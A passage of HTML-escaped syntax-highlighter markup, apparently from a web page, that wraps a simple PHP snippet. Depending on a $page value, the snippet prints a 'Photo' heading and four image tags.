font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$page&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;photo&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-71&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-ta&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(255, 0, 0) !important;&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-72&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;h3&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;Photo&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;h3&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-73&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;img &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;src&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;./images/1.jpg&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;width&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;430&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-74&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;img &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;src&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;./images/2.jpg&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;width&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;430&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-75&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;img &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;src&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;./images/3.png&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;width&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;430&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-76&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;img &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;src&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;./images/4.gif&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;width&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;430&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-77&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-ta&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(255, 0, 0) !important;&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-78&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-79&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;elseif&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$page&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: 